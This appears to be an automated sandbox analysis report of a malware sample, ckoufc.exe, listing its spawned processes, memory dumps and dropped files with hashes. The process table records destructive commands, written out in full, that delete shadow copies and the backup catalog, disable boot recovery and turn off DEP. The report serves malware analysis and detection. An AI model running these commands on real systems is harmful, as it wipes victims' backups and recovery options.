ba2950e8...7e1c

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x47c	Analysis Target	High (Elevated)	ckoufc.exe	"C:\Users\FD1HVy\Desktop\ckoufc.exe"	-
#3	0xf04	Child Process	High (Elevated)	cmd.exe	/C bcdedit /set {default} bootstatuspolicy ignoreallfailures	#1
#4	0x770	Child Process	High (Elevated)	cmd.exe	/C bcdedit /set {default} recoveryenabled no	#1
#5	0x654	Child Process	High (Elevated)	cmd.exe	/C wbadmin delete catalog -quiet	#1
#6	0xcdc	Child Process	High (Elevated)	cmd.exe	/C vssadmin.exe delete shadows /all /quiet	#1
#7	0xd24	Child Process	High (Elevated)	cmd.exe	/C bcdedit.exe /set {current} nx AlwaysOff	#1
#8	0xd68	Child Process	High (Elevated)	cmd.exe	/C wmic SHADOWCOPY DELETE	#1
#9	0x39c	Child Process	High (Elevated)	bcdedit.exe	bcdedit.exe /set {current} nx AlwaysOff	#7
#10	0xb84	Child Process	High (Elevated)	wmic.exe	wmic SHADOWCOPY DELETE	#8
#11	0xdb0	Child Process	High (Elevated)	wbadmin.exe	wbadmin delete catalog -quiet	#5
#12	0xdec	Child Process	High (Elevated)	vssadmin.exe	vssadmin.exe delete shadows /all /quiet	#6
#13	0x344	Child Process	High (Elevated)	bcdedit.exe	bcdedit /set {default} recoveryenabled no	#4
#14	0x540	Child Process	High (Elevated)	bcdedit.exe	bcdedit /set {default} bootstatuspolicy ignoreallfailures	#3

Behavior Information - Grouped by Category

Process #1: ckoufc.exe

29555

Information	Value
ID	#1
File Name	c:\users\fd1hvy\desktop\ckoufc.exe
Command Line	"C:\Users\FD1HVy\Desktop\ckoufc.exe"
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:31, Reason: Analysis Target
Unmonitor	End Time: 00:03:57, Reason: Terminated by Timeout
Monitor Duration	00:03:25

OS Process Information

Information	Value
PID	0x47c
Parent PID	0x860 (c:\windows\explorer.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 46C 0x B98 0x D48 0x A5C 0x AC4 0x 9E0 0x 39C 0x A24

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	AV	YARA	Actions
ckoufc.exe	0x00400000	0x0046CFFF	Content Changed	-	32-bit	0x0046B100			... Region Actions Download Dump
ckoufc.exe	0x00400000	0x0046CFFF	Relevant Image	-	32-bit	-			... Region Actions Download Dump

Dropped Files

Filename	File Size	Hash Values	Actions
C:\Users\FD1HVy\Desktop\ckoufc.exe	183.00 KB	MD5: 005a51a1f5a55228230aac915cf638c6 SHA1: 593796cb9d2a800356787ec3ba55427ded3953ce SHA256: ba2950e8b3212bd8e29341b032c431130dabb11581b21839cdb1e085e6837e1c SSDeep: 3072:y++p3g7s7MTktOEpangIzIwQ9m/cBnX/1yYcVCHkxHMaT2l+Dfv1myp85ULXuupr:y++e4MTARyzIwQ9zBX0pVCExsRl+DfpN	... File Actions Show Properties Download
\588bce7c90097ed212\Windows6.0-KB956250-v6001-x86.msu	2.09 MB	MD5: ad36c77308f4f9c407e1903bc8224273 SHA1: c2563c9bc82013ed58fb2823b1b34b5d65ebd2a6 SHA256: 78c92c3dfd49581f7cb19b314b796ded3f4f745d3012be20e49d78b987c77eec SSDeep: 49152:xiRzr7rGC1QcOawwuw1L2yFiJk/w3wrdrYicUABrv:xiRzr7rGC1QJarN1diowGdraUsj	... File Actions Show Properties Download
\588bce7c90097ed212\DHtmlHeader.html	16.00 KB	MD5: 5b91a446e7086ac00e758861bd5581d6 SHA1: 23f720a90e0b604a353afe7ac6268b0c369e07d0 SHA256: 5d8847c71dca6f295c55c79a27ed1e6d2dcb27906d80d2eb5a69f6f4b424a001 SSDeep: 384:vK/PcYB9LeGwIaZxwWGF2nf5Czs56UGLWL0:vK/PlPKGwCFSoy5tL0	... File Actions Show Properties Download
\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx	68.26 KB	MD5: 5709f1f3c6ff7d430deeb6b4fa37e834 SHA1: d2d057bfca2ce8c6eb3c713fd9dda860ce2bcdcf SHA256: e2316b3dda5c43db2095fea301b5628e776ec072d54e994d3bac946b75d44e80 SSDeep: 1536:sLktX2TtTe4GiQYnlA1e9ekNekkdoM5tOCdwbo2qAcJQ:PGzGjYlA1+ekMDdXgbo/FJQ	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBServer%4Operational.evtx	68.26 KB	MD5: 294cd8a474cae88d5ba37b6e254c0e00 SHA1: cad5ba22a910d2e376865691e850c0f2b7e921d7 SHA256: 6b853f28484fae3e30ec1d8f9e0cd0b0820a7e607fbe70bb65a86d818f9160a5 SSDeep: 1536:XAMfyDt/EFSDbxAbVl4PMqcVLOjAhpFEZbmhkDnt87:HfSYSDbwV6ZcwEHwmr7	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx	68.26 KB	MD5: 6f65c516d5057a31b2b32c05b4d768ae SHA1: 263c7e290a45b4fe05921e1a89511ebc8baffdce SHA256: 0a51caabcc760d15502de1e657e9cd2dbe15d1e347bf91739e7bb8b6dd9ae399 SSDeep: 1536:3dxZhVsRKTeULwgcZmP5uAO7RQ+CYoDruV9KloR+ynTDQQ2hS9er6:3dp6cTqnoq7VoDruKrynTD/GJ6	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SettingSync%4Operational.evtx	68.26 KB	MD5: 98c89fc206f61d4c56bce91235d83944 SHA1: 1b0e5ac6687dcbe0a2396a171f658bd85349f06b SHA256: e69eebd4044fceee1958be159dee18d205512bee264eb2163cad0ef96bd47cdc SSDeep: 1536:ExGWfsxdFaIRkXNayil+vHZaixUM3iEo88ASC8XhD9sIRE:8GWfsfw7XlnvHZ/5M/B9XE	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Ntfs%4WHC.evtx	68.26 KB	MD5: c52befc6a3390f95fefaed262b6770d4 SHA1: 8b0782321b459529caa88f66b2aed23adb61dc8c SHA256: 0e099bc0b4bc398c1b19e6049d2c76094f51d97ed803153eb2c70ef41ae20c11 SSDeep: 1536:mEtX8IYhQ7s8f2ht6UuKW1DyXk74ZRIverkkHe01oyX5s:mgMIEtVVW1DL4hQT4+	... File Actions Show Properties Download
\Logs\Microsoft-Windows-MUI%4Admin.evtx	68.26 KB	MD5: 83db8d0fc6581ded92ac60434fb4a1a2 SHA1: 29329209ac33870d549a3c7bb377a843f6b2ea3f SHA256: 1c8481a2d8152a391c9b999b1f43c671bffad47e63e96fa22ddcaccfb9f7c3cd SSDeep: 1536:nvjVuKovIRjMvUuaF4lHKY+hX2jVsWBavKi2RQdVugskIk:nvjVuKoIjkaF4lHXq2Vs3V2RCLXV	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx	68.26 KB	MD5: 4a281d9da407f971d723eda25ef9eab5 SHA1: e8849ad29f7418a444e6b11160be8bf0bdb0a442 SHA256: df6a3adbf86d412a39a1dd2650c4dfbf7b6498004223d528ee13a5b609efe450 SSDeep: 768:4aMDmc3Q+bWQgKgAxJARmM6AH2te1cIg1C17XhsdzMZyDT0DnjuGb4I6xritYg6w:gBaQgkxJAF6N8hsyqgjBM1xxfeW0ipYT	... File Actions Show Properties Download
\Logs\Microsoft-Windows-International%4Operational.evtx	68.26 KB	MD5: 618a6ad8d09af66828bb89a74182b279 SHA1: 1604af234ddab23075bca1d75b8e8f23a7bbb01c SHA256: 2094e5173bf17d1957a5686c468ae69c26c9164df66e1bfac25b8cbc8bc72bde SSDeep: 1536:WvMPuArtdKr4ahdJmUkhSLm4rGqXoCl7hZd3ClIo2pf:wmFtQrthum/fZRClNyf	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx	68.26 KB	MD5: 9e6709b1dbc58993d2637a78590fda0f SHA1: bbd8058d7869ba5104b50ce9195e9e7dda359ef2 SHA256: e0f13502a67e71ed213c54c4506d58ff96cab5f2eae8e6e17769e57e2eebac9c SSDeep: 1536:NzvoTvUWn6l9GzTYqSrg8Zjxox0Q6yzop/syrboMxnLXXU:NEf6H4TYdZjxox0Q1iHrLXE	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx	68.26 KB	MD5: 99936719bee65d8406323dc70390bbe1 SHA1: 14b2885409d10c34282410ca82fe9f787ba7e60b SHA256: 57f7037254c203e5afb75d68b4e57b485ce38524faa81d972b41a080da70e54f SSDeep: 1536:R9dGb9sU6F0xbZ+euhueCYqZc4S+vOzYnf0RlpgDv/yrrUNgb:RaxFvTIue0Zc4Z2zQ6HgDynKgb	... File Actions Show Properties Download
\Logs\Application.evtx	68.26 KB	MD5: 96e6ae16233b775f46e8498f9f8389e2 SHA1: 59e28934eba244212d1622400aa367dee56339d4 SHA256: e1f52008b516a367387af8d3958d71d870e816362f928d299b29b7133c01f946 SSDeep: 1536:mdxYlkQJE2gBa9qpwh2KE7QELr4EH697a56vw8LJJEYIaq:m/RP22aUpe297QEL0EHnozJq	... File Actions Show Properties Download
\Windows10Upgrade\Windows10UpgraderApp.exe	1.35 MB	MD5: cad91365f8da2b29eae78e49069c5c3d SHA1: cb91fcbdbad033dd40e25a3a5a6f6876e1826bab SHA256: f0fffc9319a1d4e8f45d13731fdbf20d4a2628d7edefdafae676f2b4ed0f77be SSDeep: 24576:Mz3JwHPB5rIomWd2NwHFcITeiGxBeBS9WvKvZ2p38esHGIjxxP6NRpz:GQPwomDcbTGfe09sqZOMeY7j6NRpz	... File Actions Show Properties Download
\588bce7c90097ed212\1028\SetupResources.dll	14.09 KB	MD5: e95fb411fbf62444d91124ee734620ba SHA1: 86cd7a4f7ea510d23fd31085a7c3cc5841601bd1 SHA256: 4adc55a079dbbea055536f9dbc9aab43f693ef48a45622f02d3706f1ce8fecf5 SSDeep: 384:Xkg6gNuGsfpz4ishTa/bQQUYKQX4G+caMFfhuv8Btx4UrLXMuod:U1gcGsxztyMQQUmX4aFfA8N4R7d	... File Actions Show Properties Download
\588bce7c90097ed212\1029\eula.rtf	3.90 KB	MD5: c2968ee29137a32987553345f6e2b6e6 SHA1: edee796ffab0a7518651f2a9658f3827ef99fd86 SHA256: 61c89082aa396dc99ac2660c361a9db7057ecaf64387abccb68007eed2def1b7 SSDeep: 96:fPU1ArbF9GJYc6jT4/yk50ajnrPZelpo8qFUv0Kx4:H2ArB9WYNXlk+ajrZUiDP	... File Actions Show Properties Download
\588bce7c90097ed212\1031\SetupResources.dll	18.59 KB	MD5: df9752acf3d9aff4c900c4b2b61e093e SHA1: e508370eded6447143192bf3c7edade727aa5bd8 SHA256: bf74956bda772b4abaeae0e2eb8aecdc6c2a122ec03abc6095957f8ca8dde5ca SSDeep: 384:JMex8K+0j0RGQk6B1h7R4IKUbeMbtpHD7pAcyvf1:+eHTwRjk6d7pKuXtpHYf1	... File Actions Show Properties Download
\588bce7c90097ed212\1032\SetupResources.dll	19.09 KB	MD5: 19425b23456a6265996aaf4c71a95c8d SHA1: aa1bd08932dd8fdaf8af4feb8b1b67d95275fc44 SHA256: d5e2f0ea259f4db42fb8b42043d60de237d443c97bcb57ba43d2abe0b95f471f SSDeep: 384:6lntqBi0ijR3lrp5oBdZhPmN4lABBiUzk2SZZUzq4QVZGnVGGaQoa5sBKd:6lteipRNoHZdi4lABBiWk2SZZ8XQV6XX	... File Actions Show Properties Download
\588bce7c90097ed212\1032\LocalizedData.xml	84.52 KB	MD5: 0e0e671e73df07ed1e06690b3f771594 SHA1: 208458fb310106a31723c34f5cb387bf424291de SHA256: 2cb222a447e71156a98b2ef065983749ab8b33acc5ba425903a66aa60e72c091 SSDeep: 1536:LD6hHU3Wpw8vfe1Fwzj1z2vJzXkxPClmAQJ5zYeIQcQ7LfwLgi:KhHUG9feQRiMPQmAQHzYeIMfwd	... File Actions Show Properties Download
\BOOTSECT.BAK	8.26 KB	MD5: 9618832ade6c613510562a8079482985 SHA1: efeed5b8d33f95e8b7b5a2b5996ba87f3a7ec615 SHA256: 6e72c9cc3014292ac4855db7972af069a8779085f6c7d7b2d5bdf1c66ef5be4a SSDeep: 192:dPewPgBTS+ciYHOktEq9ZbMC+kK/RvpmVQRKk7U5lQr:xlIBTxiukWq91MvkK/RBJD7UM	... File Actions Show Properties Download
\BOOTNXT	265 bytes	MD5: 03f8c9f13b69c123e8a2748ff47025e1 SHA1: 2c3e8f569a9a17c52fe96f0b8570b69d8a5327ee SHA256: a4c510162b8dc0b332361f179654b00a88e7b89a876d42273f11668cadddc14e SSDeep: 6:imWoqnhvywWz53v2Mu6fArHiO8GAPZ1FZz1nGrvQwva+vOLqqnUMJk4V8/:sorZ3uMu6KCmW1fqKF7Fe4V8/	... File Actions Show Properties Download
\$WINRE_BACKUP_PARTITION.MARKER	264 bytes	MD5: 28387eab8fa7d5914b6f96336351b464 SHA1: d26a09ba4f1aa9ee1f241d5467023017d37f813c SHA256: a311a29ed6ad9d3dcd31db20d678f17d89d97d49c104f77748ddbd60a6d1f302 SSDeep: 3:b3PpGcPPvhW9j5o9orS2W3QHhAdsOKLgmLXEkFzgYyu9VWAH4L83FDqYXSIRjLA7:J3hIYeFBBhLXEYTFuzw3VjYaX0QR92	... File Actions Show Properties Download
\588bce7c90097ed212\Windows6.1-KB958488-v6001-x86.msu	2.04 MB	MD5: 5ffe168a91f970686f13d45ff276e8ae SHA1: 0c43defdb521150290e435c27f158716a88a0a50 SHA256: 31a810486c3f399b09bea64f83ce7e45f30acf9b21352aaa81f4820abdd7d308 SSDeep: 49152:piAZlLMppY2/VOqWdNKk+WJ+QcQdlNcolwPs2jpnJnljsK2s2:pigGpVBW3zVc2Woy5pnbjsK/2	... File Actions Show Properties Download
\588bce7c90097ed212\Windows6.1-KB958488-v6001-x64.msu	4.86 MB	MD5: e5c7bc5d76c89480ea859e4a7720911d SHA1: ab6b3020409171dcefd69dea497d0d7cabde0feb SHA256: e0cb76c821afb824cc139ed85b9c2a844a0607028a130466a05c1e6992e509e5 SSDeep: 98304:G5B4XrFvE4NhJ2sfvkdIWViVVANt21YJ6GLZsylnfKRV:GqZvE4NhJyIsiVVA6KEuZsylE	... File Actions Show Properties Download
\588bce7c90097ed212\Windows6.0-KB956250-v6001-x64.msu	4.96 MB	MD5: 477a70a7e848c0aa91911422abe5eb07 SHA1: a4e797bad1bd8c7912dcdc7911c2189ccc6c71fe SHA256: a50c568259f8fd4667abfb185997b331d2e5a453918b74283d4102e78c9619b9 SSDeep: 98304:17MuUQSm/Yb2PhMXkN490qBzXdKRicvKt4yBnKL7UKjCvxaNrgiN:1M3QT/YCPhMz90sXAgrWYKL7Tu5aaiN	... File Actions Show Properties Download
\588bce7c90097ed212\watermark.bmp	101.89 KB	MD5: 2cc0cfa0bc2e5d37cb33383e02850189 SHA1: 269c19f43918f41ab1e0655c825ed1821a38f8bb SHA256: 360ba4341eebe8cf22d35bc857f60d673b90c1831ffaa24b347206fff1b5bc1e SSDeep: 1536:9nXbO7tefLIwTl/lkK/K6YwAToEKUOP8xugAuLAn2jVTZqox1MbJh7KTQFPgQUct:9nXqBwPtf/K6eiVfgAs46aKQVnUcG5a	... File Actions Show Properties Download
\588bce7c90097ed212\UiInfo.xml	38.24 KB	MD5: 004828d63d6da6cb0a2e927e3569510d SHA1: 06eee5d60acd4b020996a3792a293f914b0ee716 SHA256: 8a24db27c00659c9a0fdc0b679f2d4b423f907dfe86371c282ae52a7f5fb4a0a SSDeep: 768:WpytISkPzdVQdV/1SHL5pXjTImQsHVcyAEnceBkq84NnqbIRp:Wp4ISkPzDQX1SHlpTTImQ82kcGSKqERp	... File Actions Show Properties Download
\588bce7c90097ed212\Strings.xml	14.01 KB	MD5: c16be0e3e246685f67e2037140c8e963 SHA1: fc8d5c77aa7a58ede985f4201795b8b06bcaffe4 SHA256: 130b9ff0822c6e3dbcec2472f846f9d13e576343b8a7cbe350bf55a8fba88657 SSDeep: 384:Cqma9E/cYTW37XzSarsHFNvj8/IWHGHat0gCsNg+hjUUpeVXZ62:Cqm6E/uTKbszmv2g+hoUpeVXZ62	... File Actions Show Properties Download
\588bce7c90097ed212\sqmapi.dll	141.29 KB	MD5: 7584fafc360ee7e2ca2039e25f907dfb SHA1: 78f8c9611d01e1e85edbf21014d450426aa99224 SHA256: 4e5a90f38c5edb5eedf3e43d5519e717211f4954a7d15cd215bbf1b41dbea1bd SSDeep: 3072:FXEO6+3mFhmRXaDYGrb3ymp0qiDqZ84xsNEVCB4jnfpf:tEOQhmRM1rb3ympPiDqG4KQ+4jfZ	... File Actions Show Properties Download
\588bce7c90097ed212\SplashScreen.bmp	40.38 KB	MD5: af29d4d94f5ec1da5f13a0117f0d34eb SHA1: b3e69b33c838d25f6624a8e7a73c16dada7c0efa SHA256: a81d3269d3e54514e948ab559983cd862a9dd34d2e09ca09079f203bcd91508c SSDeep: 768:DZxX9J84WgOJrhx/gBR0uAQLlC0Ih+/DrOELX4o:DZxtm4Wrhx/gjTLlzDvLXl	... File Actions Show Properties Download
\588bce7c90097ed212\SetupUtility.exe	94.09 KB	MD5: c09ee71c2e8802d35d80bcc2b673f057 SHA1: a47dce2e0bda62b9f312a90941c79dc5d10fcb7c SHA256: cfa328ee8ce9f89fef1d2c0073961aa88c9a40229f6988b607276e7a330debb6 SSDeep: 1536:HXKG6uYs+N6BWusgsBs5kut0tUZtbcByPP0d8eZeXWLuoxPYyUnmRNBCFwJsl/GS:3KUYs+NFwkut0wIy3YeGLfongBiOskHy	... File Actions Show Properties Download
\588bce7c90097ed212\SetupUi.xsd	29.67 KB	MD5: 4c190c02a6b38a6a9ed05a848a96e0f9 SHA1: 3fee2262067e743499e3b84b84621c22befb5ef5 SHA256: dc9de8a842a7400f9cc7aded6461aaae09bed9f28e12ced24bb066b06276439d SSDeep: 768:JRHb4pjYDbr6o7GVdqLbTcov/bTsfimjRK:cp0GCOdq7BfsfisK	... File Actions Show Properties Download
\588bce7c90097ed212\SetupUi.dll	288.59 KB	MD5: b5904bd2169c0b5e4047513a249ba565 SHA1: f98fc6fd5d447dad80df6f58009b4da661622728 SHA256: 25120dd31291e03d75d040f3d38b605570cc6a79a76998cbe12b861015135750 SSDeep: 6144:zZMsugtCppXyr8uWRvAWImdqmdSgIa8WOd+lTYem4zRptZ:zZJFCQFWRvDImdxdSgIa89AGemA	... File Actions Show Properties Download
\588bce7c90097ed212\SetupEngine.dll	788.59 KB	MD5: be33674e14ae41bc3254f9d7b33c5a3b SHA1: a0de8d2fc21abfd1802ee5f55b327c471c8a9de4 SHA256: ae4341bef88f2c6b65b0348176c9803cfacba9383df13eabaae07a7dacc5a4eb SSDeep: 24576:Y9GRaQCubz+d3JtNvHuakeoxmX8+GzMA/BvZmr/mU:YSaEGdZnvH1ZVXaMObc/mU	... File Actions Show Properties Download
\588bce7c90097ed212\Setup.exe	76.58 KB	MD5: f2cc61f8374fa216de2045ab51081de7 SHA1: 38e29df1c5696ec1825d5f7b1dd0c76302aad019 SHA256: 060de9a20d36b8d75d6ad1493639e347532bfbd8f1091ad66a7f3eac91ffa412 SSDeep: 1536:67WH68MRWyWtgjB3+YpfgDwMIjL5/YcGZhiGBKAz7iRnq/c8j:f6xRWGjh+FwMcLel7k47i0Es	... File Actions Show Properties Download
\588bce7c90097ed212\RGB9Rast_x86.msi	92.76 KB	MD5: be3998ac2327711e31b86acc5e5c5563 SHA1: 8eceb6b4ca58a4536a9346d445d3792170155ebc SHA256: 0e9d130a7428bdcc2c377653517906c64dbffdad2bd56350bf5dcfb9821a4df6 SSDeep: 1536:dBSQAiNlLfCdpqRVcR49zeourRSESmv/JL5i6OHDvuI/QMY24K4GbVP:dBSQAiNlLfsy8ZEhURoHDvHQMYk4GR	... File Actions Show Properties Download
\588bce7c90097ed212\RGB9RAST_x64.msi	180.76 KB	MD5: 122c63fe88340291cc7594615a43e3e1 SHA1: 7c661aca63fee8ff0d0349b520f8bf5201a0a291 SHA256: 4cebfcabb82016760c67939dde29ab8b1182362528cd4db7665e4eadfd858b4a SSDeep: 3072:6C0eLllee1CZa8dJNpmVM6+5hr/guJ/Zl5vGEtp1RjZDedzU1IsQ+kfGgoCQa9uY:6L2Le4RoJPmq6+XgS/ZlphSlUHQ+eSCb	... File Actions Show Properties Download
\588bce7c90097ed212\ParameterInfo.xml	265.93 KB	MD5: 6472bbfb50b315f214b0676b0a810735 SHA1: 1370691e20f2492ca862a26cb3739a979f071ade SHA256: 0507d18092502946bf93d52a0b7781c3f3ffd4d7fd425072506b6dcc0fdae76f SSDeep: 6144:MuoVcUIGXUyi6WM3TIbGT9hqfqQw3bGIXkRr/8iitNxRV6ch:MuodJ26WM3VEqQwrr0L8iENxb9	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Extended_x86.msi	484.26 KB	MD5: 7377cc627c8feead72dc0a0a5cf1118e SHA1: c6c72d364df3d175c0babee0ded7eee50b34d912 SHA256: f50c17993a23523a4b7e425f2364d2cb057f5e042b10903661db75de35a24ee8 SSDeep: 12288:+wttn3UWnKbkf8TQMgJV47ReAZPFdnGg50c19Z3Ao1o+Oa3R:Ftx3UWKbkf88MgJV4BDcgyOQgO0	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Extended_x64.msi	852.26 KB	MD5: e97fde10312251f844f76bd4af962217 SHA1: a10296397cbce401e2160e89a72c92ef5ce4dfe8 SHA256: c62a93dc3895af0fee24c1dab29aae43dd34a98a12b81d06611e50eaa10f1c35 SSDeep: 24576:J7CQxqLXVytzO/Eq0nmcHN9sVV3k0U8I+jKjpmOUA:FZxcGzOsq0mcHNE55I9jdx	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Extended.mzz	41.13 MB	MD5: 680bd1bf3bc4adf40182ad1a42d2248d SHA1: 12cc1933af109b51961d35e221e3b96db4b48bd4 SHA256: e0a758756955a844a816015962c9867d4aa584d39bd2bca9d783f038428ac88c SSDeep: 196608:pqEv5vUMWhOOcc3Sr1GCcjpWjUCFKz3HS5O0qzVnKcNhy4zr6ShDYSmVDTKqZxp:o936v6GXF6XS/cv/7hMSmJTx/	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Core_x86.msi	1.11 MB	MD5: c277860afb390c5310a34c4105053402 SHA1: 420dd0088304fad88e241c543774227d35b8ab7b SHA256: 617beda243f5dd6a6cc9f82ece035d95a470de5cfc388f8679b8346b234ebbf1 SSDeep: 24576:JJMipR7Dh75N5lBHfMVhL3f7cpl4/oBDWOQZNnRX8Q8FswriyDUeUEA6SlzZ3O:Jiizh7hlB/QLv7SB6OMX8iwrxYeNAXlw	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Core_x64.msi	1.81 MB	MD5: b0b8b820c7c6f0fffafb44a528ccd3ff SHA1: e24f3f4cdb997efed2207458559a5df96c9500bf SHA256: bbac44ee6d252ebd422adc1e8ef3daa3c70b8d52a8c871d4d4544823080451f9 SSDeep: 49152:dpA2KNJNV1PFSLswOZfKR2b20ZBP5fv6vCy5FNQRdRd:dpA2O5hqOxKR2CCBSTNa3d	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Core.mzz	173.08 MB	MD5: 86532abba7e19507ba1305c0647206e0 SHA1: ad22a069483dbdae2105b126a25c5ac64404a9e8 SHA256: e12e8b0c6391ed5116eacb201660aa1cb9332c1a175a485603985fd469aca8f1 SSDeep: 196608:pF64iqE0Z3dIkWdCBNe1wv5nLbBmu+HiAxXQzD4Xe47BUWVxgjoX5qph1kGbBeuk:pFxivsdIkWdCBNe1ibkuAxxXaIB7wa5F	... File Actions Show Properties Download
\588bce7c90097ed212\header.bmp	3.80 KB	MD5: 0bb5abd36704b308696d5ca77844eaad SHA1: 45970982c31a9752d8cf1d6175881c5fb1c1f0fd SHA256: 2dab228f8431816a8fbcfc180ae128fe9ead200de7d6b112d5dbf986b0deabe5 SSDeep: 96:BnGSXvEOYcVXYvuiOCdcFcfNKu7nWe4nOUt:Bnt0cVXKihFCf7We4lt	... File Actions Show Properties Download
\588bce7c90097ed212\DisplayIcon.ico	86.72 KB	MD5: a5fd6d2601842e97b941db656b37cf4d SHA1: 579cdb33716d2f3cd13f94cd11b93ca409d46ff2 SHA256: 1e63ec4a0987fcc3e4ad8690dce43e3b53a5ef4650d42fb9862f934139026372 SSDeep: 1536:tbhW0r5MxfDlXgKd8IVBI2bM+yW6JpXVuvnmb2vYZQZYeiOrG0ywb5RlRp/7DwXd:i0r5MxLlkIM2b/6D0npvkeiO6wRrj0TJ	... File Actions Show Properties Download
\Boot\BOOTSTAT.DAT	64.26 KB	MD5: 9e473ff1f1335191357bec0ffbde9453 SHA1: 55307ebcbc71118d48fde009f512d1150a140e96 SHA256: 1628aa701b44de38d3e970bc8e20b97a4905ce2c3da9a5abbde520d8c2905bc1 SSDeep: 1536:rPZOxd+qqP+1RwDGk3eH84Ji5Zo+fAfsEluW08mExuYVD1SCJBJ:zZOT8+1mX3eH84Ji5+aApR08mId9YCV	... File Actions Show Properties Download
\Boot\BCD.LOG2	264 bytes	MD5: 85f4f7ac8edfcfbbe4afa95e4cbb55ea SHA1: d922c3d219ae6ecf617c77385c055933ccaecd3d SHA256: 525e8b01e456bdd73f6465a3e7d40b0e5ae0f89377739477080c6bf5d1cc4a7f SSDeep: 6:WiTXSK3E/i95AQl5JG0fMr0+mTPLs0XMLl5PHOvf3l:WEvsyBXMwpDYrLl5PgN	... File Actions Show Properties Download
\Boot\BCD.LOG1	264 bytes	MD5: d2a5e8aedc792345fb35ed8e176bff4b SHA1: 019966111e85d89789b06d94fba3c0c1fe35aa1d SHA256: 00b7f8061cf3f7a78e7bdc1fe6175f527ab823e013801c13bf39680d02adf4df SSDeep: 6:cYdSGopz22MXpKkSMRVl/ShJd21QvSwIkxYmt4sbMU62nzDB:sG0NgSaAt21bwISvVdnz9	... File Actions Show Properties Download
\Logs\Windows PowerShell.evtx	68.26 KB	MD5: 8eac6f88446eeb216084786ae7344ac5 SHA1: 1c79dd873dc33d44bc0d20f618bcc73235d2a538 SHA256: d2fe7a5d890f9de96c5aa91bdb29cd16a041ffe7659410269a87dd7e90bad464 SSDeep: 1536:p2FjVPWvSQ0qyz8tpkOtGMU+94nNyzkrcs9iCSBHpkvMUzgWIUr:ojVJTq9tpxtBUznNyzkrcswpkEUhV	... File Actions Show Properties Download
\Logs\System.evtx	1.07 MB	MD5: e29afe5e2f3e054d36eaa3a0173452a1 SHA1: 6b9fb11f24a5a578b7841350703d449ffdd312ce SHA256: 9b5cce072d0d24dcd4a6e7c12c36b60a5263f5944b7cd8ab2e6e673b3b6ba7bb SSDeep: 24576:NP+VmtIEPp+Z4BOJlOfLXBWcaMmuErvFqX4BxKm1Q+SR+ndmOUSLX0kU9:NPbtFgZ4BOPoXBWBMmRrFqX4FQf+mOUl	... File Actions Show Properties Download
\Logs\Setup.evtx	68.26 KB	MD5: 8632321a3155867331097ad0c535fc8a SHA1: c9728d0d20673ef8a56ec82b8023359c669af028 SHA256: c75ddaf2f89fcff0b16b95664826c10c549709a764714c1d7e6ee5cb7386aa99 SSDeep: 1536:eJo5EXBXR+995LORyf8c5EmOa1ZFPoKdfC1PujlDl:moIBXENLCm8c5EmT1ZjfRjlDl	... File Actions Show Properties Download
\Logs\Security.evtx	1.07 MB	MD5: 2213c4e59bcc717bbca574689fc396ad SHA1: f5cb1e320ae94c699ee271aaca3e8784d3a26235 SHA256: 7e9aa551169e65b310214b0562bc71f0be62d8c0d1241f7497526e76d3ab6ab4 SSDeep: 24576:o6MFafLNhM/7tmJ72OVUPeOWhPnI3YR43hj1J:o6MFcNhg7DOVUPeOWhPIYiJ	... File Actions Show Properties Download
\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx	1.00 MB	MD5: 0d17009575119a1e541f5fd15743fee6 SHA1: 490854184586b3702e3ad45a00735329a277c14f SHA256: 4c319b67239c7b9e327ed2bd2c865585c71067241d00e10911f035a7b22f7149 SSDeep: 24576:JWGEcJrKHOPYglf4TwE2j2shFdXNFUf+2Mtp/Z1bG:WcJKHQYgKTRAFdTUf+28Z4	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Winlogon%4Operational.evtx	68.26 KB	MD5: a34ec4ec03121b549d1a1ff705900a5e SHA1: 43726bb283fb21352181850e3103437f419e0af4 SHA256: ac57aa6e2ab9d013576cb48ac2288f397700c9cc8d268c4d3ad61e85f80ab449 SSDeep: 1536:cMgy9LDHb3WPUh9gpuNcTuyGXn70uSM9i0x3mtWSX231E:c/4Wk91c7UQ7M9i0Jmt3Xwa	... File Actions Show Properties Download
\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx	68.26 KB	MD5: b6f68b3eb94e9c92d76b765ac4e60159 SHA1: 928f5448cfaa50810801e1d9d9c070a0f5a329b7 SHA256: 5e4a5a0f56c527434d6e5d30b4c14fc0b10389dd2a1c1039c16ce79afbc2342a SSDeep: 1536:jiZpJ7lfK04UUoHYhO/mUEFyOLWCAXvfTsIRAUKWW3nOYCay:4rZz4UveTBLtA/gIRAU7wZy	... File Actions Show Properties Download
